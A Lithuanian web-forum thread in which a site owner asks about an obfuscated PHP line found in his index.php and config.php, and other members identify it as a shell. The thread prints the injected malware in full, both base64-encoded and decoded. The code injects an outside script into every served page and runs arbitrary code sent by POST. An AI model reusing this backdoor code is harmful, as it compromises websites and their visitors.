Pradinis
Pagalba
Užsisakyk!
- Reklamą
- Hostingą
- El. pašto dėžutę
Užsisakyk!
Įrankiai
Pasidalink
- Visos temos
Forumas | Kita | Off-Topic diskusijos |
Autorius: Deiviux.eu | Peržiūrų: 1307 |
Deiviux.eu Narys Tankas Pranešimai: 1882 Įstojęs: 2007 Geg. 2 13:05:17 | |
Sveiki, šian puslapyje radau tokį dalykėlį index.php ir config.php failuose. <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneXR3dHcnKSl7ZnVuY3Rpb24geXR3dHcoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjlwYkhkeVpYTjBiR2x1WjNOMFlXZHdZWEowYVdWekxtTnZiUzkzWldKaGJHbDZaWEl2ZEdWc2JHMWxiVzl5WlM1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiB5dHd0dzIoJGEsJGIsJGMsJGQpe2dsb2JhbCR5dHd0dzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHl0d3R3MSkpY2FsbF91c2VyX2Z1bmMoJHl0d3R3MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0neXR3dHcnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd5dHd0dycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR5dHd0d2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3l0d3R3MicpKSE9J3l0d3R3MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?> Pirmą kartą tokį dalyką matau, norėčiau sužinoti kas tai do daiktas. Bėje, ESET Nod 32 metė kaip virusus visus .js failus. Prašau ŽINANČIŲ pagalbos, ar tai susiję su member_poll_panel? |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
Na nežinau ar apklausų modifikacija turi ką nors bendro su shell'u, bet šita eilutė reikia iškart IŠTRINTI! Kadangi nežiūrėjau koks kodas, tai galimas daiktas, kad galima trinti/redaguoti failus ir taip toliau. |
|
VIP narys Terminatorius Pranešimai: 1358 Įstojęs: 2008 Rugs. 1 15:09:08 | |
o tu susikurk failą su tuo kodu įsidėk į ftp ir žinosi kas čia |
|
botanik Narys Ekspertas Pranešimai: 2416 Įstojęs: 2008 Gru. 16 12:12:30 | |
taip, tu teisus, shellas ;]]] |
|
MAnjack Garbės narys Legenda Pranešimai: 11821 Įstojęs: 2006 Kov. 2 20:03:58 | |
Va iškoduota:if(!function_exists('ytwtw')){function ytwtw($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL29pbHdyZXN0bGluZ3N0YWdwYXJ0aWVzLmNvbS93ZWJhbGl6ZXIvdGVsbG1lbW9yZS5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function ytwtw2($a,$b,$c,$d){global$ytwtw1;$s=array();if(function_exists($ytwtw1))call_user_func($ytwtw1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='ytwtw')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ytwtw');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ytwtwl=(($a=@set_error_handler('ytwtw2'))!='ytwtw2')?$a:0;eval(base64_decode($_POST['e'])); |
Peršokti į forumą: |